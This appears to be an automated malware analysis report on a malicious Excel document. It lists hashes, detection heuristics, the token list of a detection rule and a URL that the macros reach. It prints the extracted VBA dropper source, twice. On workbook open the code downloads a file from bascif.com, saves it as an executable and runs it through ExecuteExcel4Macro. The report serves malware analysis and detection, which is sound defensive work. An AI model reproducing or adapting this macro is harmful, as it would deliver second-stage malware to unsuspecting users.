Office (OLE) malware analysis — malicious · 412a76221b95352f

MALICIOUS

Office (OLE)

156.5 KB Created: 2019-05-18 07:27:21 Authoring application: Microsoft Excel First seen: 2021-04-10

MD5: 5f972e9640095bbf27ffcf4ef3bd2b54 SHA-1: 42d5d442d1cee8d224fba15cf7ecbffedaadfb51 SHA-256: 412a76221b95352ff08b86f569ed99599a7cd6ebacc24ccbdd770a7b24b121c7

310 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is a malicious Excel document containing VBA macros. The Workbook_Open macro triggers the execution of other VBA code that utilizes CreateObject to download a file from a remote URL (http://bascif.com/tt2) and save it to disk, followed by execution. This behavior is indicative of a dropper or downloader, aiming to deliver a second-stage payload.

Heuristics 9

ClamAV: Doc.Dropper.Agent-6995782-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6995782-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
    .write UserForm8.Stack1.responseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set UserForm8.ProAsO1 = CreateObject(UserForm8.Label2.Caption)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub WorkBook_open()
```
Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://bascif.com/tt2 Referenced by macro
- http://t2.symcb.com0Referenced by macro
- http://tl.symcd.com0&Referenced by macro
- http://t1.symcb.com/ThawtePCA.crl0Referenced by macro
- http://tl.symcb.com/tl.crl0Referenced by macro
- https://www.thawte.com/cps0/Referenced by macro
- https://www.thawte.com/repository0WReferenced by macro
- http://tl.symcb.com/tl.crt0Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

Filename	Kind	Source	Size
`macros.bas`🔏 SignedVBA project digital signature Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2950 bytes
SHA-256: `6bf0482c92eb0afde15c7fd82f89adc76df8d6c43ac57ea255e56a49cb5a8d30`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub WorkBook_open() UserForm7.Show End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public Sub Anykey() Dim time time = Format(Now + TimeSerial(0, 1, 1), "hh:mm") ExecuteExcel4Macro "MESSAGE(True, ""release"")" #If Juliet Then Dim varSet5 Dim varSet6 Dim varSet7 Dim varSet9 Dim varSet8 Dim varSet11 Dim varSet12 #End If End Sub Attribute VB_Name = "UserForm8" Attribute VB_Base = "0{24288D79-5638-4C5C-B208-07A6C623B1F7}{1AB7E616-12BE-48D9-AF15-467C948DFF4D}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Public ProAsO1 As Object Public Stack1 As Object Public ProAsO2 As Object Public Stack2 As Object Public ProAsO3 As Object Public Stack3 As Object Public Sub Label5_Click() Dim varSet5 Stack1.Open Me.Label3.Caption, Me.TextBox3.Tag, False Dim varSet6 End Sub Public Sub S1000() End Sub Public Sub frfr4() End Sub Attribute VB_Name = "Class1" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Public Sub stvb113() Sheet1.Anykey Set UserForm8.ProAsO1 = CreateObject(UserForm8.Label2.Caption) Dim varSet4 Set UserForm8.Stack1 = CreateObject(UserForm8.Label1.Caption) Dim varSet3 UserForm8.Label5_Click UserForm8.Stack1.Send With UserForm8.ProAsO1 .Type = 1 End With UserForm8.ProAsO1.Open With UserForm8.ProAsO1 .write UserForm8.Stack1.responseBody End With #If Romeo Then UserForm8.ProAsO1.savetofile "all.e" & "xe", 2 #End If End Sub Attribute VB_Name = "UserForm7" Attribute VB_Base = "0{D08B52F0-0485-4D2A-B95C-1D2B5DA1C733}{A550A1B3-7AE1-42F4-944B-573CACD6D0DE}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_Activate() Dim c As New Class1 c.stvb113 ExecuteExcel4Macro UserForm8.TextBox3.Text ExecuteExcel4Macro "MESSAGE(True, ""9999"")" Unload Me End Sub

macros.bas🔏 Signed

vba-macro

oletools.olevba.extract_macros (decoded VBA source)

2950 bytes

SHA-256: 6bf0482c92eb0afde15c7fd82f89adc76df8d6c43ac57ea255e56a49cb5a8d30

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub WorkBook_open()
UserForm7.Show



End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Sub Anykey()
Dim time
time = Format(Now + TimeSerial(0, 1, 1), "hh:mm")

ExecuteExcel4Macro "MESSAGE(True, ""release"")"
#If Juliet Then

Dim varSet5
Dim varSet6
Dim varSet7
Dim varSet9
Dim varSet8
Dim varSet11
Dim varSet12


#End If
End Sub



Attribute VB_Name = "UserForm8"
Attribute VB_Base = "0{24288D79-5638-4C5C-B208-07A6C623B1F7}{1AB7E616-12BE-48D9-AF15-467C948DFF4D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
 Public ProAsO1 As Object
Public Stack1 As Object
 Public ProAsO2 As Object
Public Stack2 As Object
 Public ProAsO3 As Object
Public Stack3 As Object



Public Sub Label5_Click()
Dim varSet5
Stack1.Open Me.Label3.Caption, Me.TextBox3.Tag, False
Dim varSet6
End Sub

Public Sub S1000()

End Sub
Public Sub frfr4()

End Sub


Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub stvb113()

Sheet1.Anykey


Set UserForm8.ProAsO1 = CreateObject(UserForm8.Label2.Caption)
Dim varSet4

Set UserForm8.Stack1 = CreateObject(UserForm8.Label1.Caption)
Dim varSet3
UserForm8.Label5_Click
UserForm8.Stack1.Send

With UserForm8.ProAsO1
    .Type = 1
End With
    UserForm8.ProAsO1.Open
With UserForm8.ProAsO1
    .write UserForm8.Stack1.responseBody

End With
#If Romeo Then
    UserForm8.ProAsO1.savetofile "all.e" & "xe", 2

#End If

End Sub

Attribute VB_Name = "UserForm7"
Attribute VB_Base = "0{D08B52F0-0485-4D2A-B95C-1D2B5DA1C733}{A550A1B3-7AE1-42F4-944B-573CACD6D0DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()

    Dim c As New Class1
c.stvb113

    ExecuteExcel4Macro UserForm8.TextBox3.Text
ExecuteExcel4Macro "MESSAGE(True, ""9999"")"
Unload Me
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.